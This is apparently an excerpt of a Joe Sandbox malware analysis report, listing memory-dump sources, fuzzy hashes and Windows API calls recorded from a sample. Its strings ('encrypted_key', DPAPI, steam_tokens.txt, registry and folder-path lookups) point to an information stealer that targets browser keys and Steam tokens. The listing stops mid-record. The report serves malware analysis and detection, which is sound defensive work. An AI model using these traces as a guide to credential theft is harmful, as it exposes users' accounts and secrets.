                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: 1c6646455758fcf6fd035040a1452a0b9aac2608f53c849ccee96f26f32a14eb
                          • Instruction ID: beb512ced21539a9e1ad13e2631b681b0420e7cf8285952a79cb0f80874efcf0
                          • Opcode Fuzzy Hash: 1c6646455758fcf6fd035040a1452a0b9aac2608f53c849ccee96f26f32a14eb
                          • Instruction Fuzzy Hash: DE415E757057069BDB21CF69EC84BAAB3E8FB86305F15456AEC4DC7340E631E900DB90
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 003A9CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 003A9CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003A9D03
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: 918ed29ce955f9d384e300933e947184671aff8b3c53d0d29f38c28a9fe46f7a
                          • Instruction ID: 1f2365916e56a230aecaf44547a10de0d64f38d7cede4b18e99c84099757ad02
                          • Opcode Fuzzy Hash: 918ed29ce955f9d384e300933e947184671aff8b3c53d0d29f38c28a9fe46f7a
                          • Instruction Fuzzy Hash: F841A471A002099BCB22EF78DC457EF77B4EF56314F0585AAE915BB262EA30DD44C790
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BEA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BEA53
                          • lstrcat.KERNEL32(?,00000000), ref: 003BEA61
                          • lstrcat.KERNEL32(?,003D1794), ref: 003BEA7A
                          • lstrcat.KERNEL32(?,00F29108), ref: 003BEA8D
                          • lstrcat.KERNEL32(?,003D1794), ref: 003BEA9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: f1e1bc4318ddfb50d6bf70b00d28e718878c0bc3c6153de01f0ac93cd8b73587
                          • Instruction ID: c2ec1012b47101289094cfc5293fd5c91862f7365764c174f0139daef8344316
                          • Opcode Fuzzy Hash: f1e1bc4318ddfb50d6bf70b00d28e718878c0bc3c6153de01f0ac93cd8b73587
                          • Instruction Fuzzy Hash: BF419971A11119ABCB26EF68DC46FEE7378FF59300F00445AFA1A9B291DF709E489B50
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BECDF
                          • lstrlen.KERNEL32(00000000), ref: 003BECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BED1D
                          • lstrlen.KERNEL32(00000000), ref: 003BED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 003BED52
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: afbd5051ddd72247185faabbab14adb4b358fc85ccac3a703c7aecb321e551f9
                          • Instruction ID: e3b7fb9099c3b18b4d6b2f05a2a31a0c1eae0c2191aa3329615851700436999d
                          • Opcode Fuzzy Hash: afbd5051ddd72247185faabbab14adb4b358fc85ccac3a703c7aecb321e551f9
                          • Instruction Fuzzy Hash: 58316B31A111155BC723BB7CE84AA9F7BA9EF12704F051029F946DFA22EF20DC2687C1
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,003A140E), ref: 003A9A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,003A140E), ref: 003A9AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,003A140E), ref: 003A9AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,003A140E,00000000,?,?,?,003A140E), ref: 003A9AE0
                          • LocalFree.KERNEL32(?,?,?,?,003A140E), ref: 003A9B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,003A140E), ref: 003A9B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 2a7190b5ca2b24361e47c2e6e5bee084bfaf451471f900b2fc6942d72efc94a0
                          • Instruction ID: 54eb0a7ddae998b27f70252ae9cf887435bea34495d3c2bb82d267f576daae9b
                          • Opcode Fuzzy Hash: 2a7190b5ca2b24361e47c2e6e5bee084bfaf451471f900b2fc6942d72efc94a0
                          • Instruction Fuzzy Hash: 4711217160520AAFDB21DFA9DC88FBA776CEB15740F11416BF911A6280EB709D54CB60
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C5B14
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA188
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 003C5B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 003C5B89
                          • memmove.MSVCRT(00000000,?,?), ref: 003C5B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: 2ea607957dc109fec56ef5a408928d5dd29e4ddd041e36ba7c97a19305ad6371
                          • Instruction ID: 182e5123cbdcdac6b1e7d9a3db9c7ae1c931e8ba8def6f22ba2595593389b0fc
                          • Opcode Fuzzy Hash: 2ea607957dc109fec56ef5a408928d5dd29e4ddd041e36ba7c97a19305ad6371
                          • Instruction Fuzzy Hash: AD415072A005199FCF19DF6CC995BAEBBA5EB88310F15822DE919EB344D630ED418B90
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003B7D58
                            • Part of subcall function 003CA1C0: std::exception::exception.LIBCMT ref: 003CA1D5
                            • Part of subcall function 003CA1C0: std::exception::exception.LIBCMT ref: 003CA1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 003B7D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 003B7D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: f213974a9ebfcd037e348a7126b41d9eb56b87a76c702e76d699fec440974b6e
                          • Instruction ID: 7445f32fc78a09ce57a70973124df4a281be76fc807dd908950f412f2212a185
                          • Opcode Fuzzy Hash: f213974a9ebfcd037e348a7126b41d9eb56b87a76c702e76d699fec440974b6e
                          • Instruction Fuzzy Hash: 1521E9323186044BD722DE2CD881A7AF7E5EFD1798B214A6EE582CBB41D770DC408761
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C33EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C33F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 003C3411
                          • wsprintfA.USER32 ref: 003C3437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: 794044fc6a7125fcce5017b9b5ac6504fde8e5b7d80fa873599a3035f6f0f460
                          • Instruction ID: 3365a4a921ca6ff005a2c3cb457e9adbd1f1d857e82b99a5468be4a1f84706cd
                          • Opcode Fuzzy Hash: 794044fc6a7125fcce5017b9b5ac6504fde8e5b7d80fa873599a3035f6f0f460
                          • Instruction Fuzzy Hash: CD01B1B1A05618ABDB15DF98DC49FAEB7B8FB44710F00422AFA06E7380DB746D0087A5
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00F2D960,00000000,00020119,?), ref: 003BD7F5
                          • RegQueryValueExA.ADVAPI32(?,00F2ECF8,00000000,00000000,00000000,000000FF), ref: 003BD819
                          • RegCloseKey.ADVAPI32(?), ref: 003BD823
                          • lstrcat.KERNEL32(?,00000000), ref: 003BD848
                          • lstrcat.KERNEL32(?,00F2EDD0), ref: 003BD85C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: 35690128860f02f35133167273acebda0c454419f6726a3250b4a2e48c7408fb
                          • Instruction ID: d8240f3603093624002092a5f822ee65760bc6a3c7e1961382df943175ede118
                          • Opcode Fuzzy Hash: 35690128860f02f35133167273acebda0c454419f6726a3250b4a2e48c7408fb
                          • Instruction Fuzzy Hash: DC416575A1010CAFCB65EF68EC86FDE77B4EB55304F004066B6099B661EF30AE498F91
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 003B7F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B7F60
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003B7FA5
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003B7FD3
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003B8007
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 19cb5b4ce8f6f6256d5c95a568f410ba22f720fc6badcf37d96da304d88b2d0f
                          • Instruction ID: 98f10348c52882ae44a9ea25a6851095f134ede4271bed61d2a64ab83e6923f8
                          • Opcode Fuzzy Hash: 19cb5b4ce8f6f6256d5c95a568f410ba22f720fc6badcf37d96da304d88b2d0f
                          • Instruction Fuzzy Hash: 5D41B230504116DFCB22DF58D484EEE77B8FF94344B110099E906EB751EB70EA65CB91
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 003B80BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B80EA
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003B8102
                          • lstrlen.KERNEL32(00000000), ref: 003B8140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B816F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: c6030bbbe314ede6c7487f543d7cd4ad312fb75bbf428031f7d474d0737105d1
                          • Instruction ID: c349d157447ad765aec9c271dbaa89f546eaed74261be5a2b6d6134221363888
                          • Opcode Fuzzy Hash: c6030bbbe314ede6c7487f543d7cd4ad312fb75bbf428031f7d474d0737105d1
                          • Instruction Fuzzy Hash: 07419C75A01106ABCB22EF6CD948BEABBF8EF44744F11801DA94AD7614EF30D946CB90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C3166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C316D
                          • RegOpenKeyExA.ADVAPI32(80000002,00F1B9E0,00000000,00020119,?), ref: 003C318C
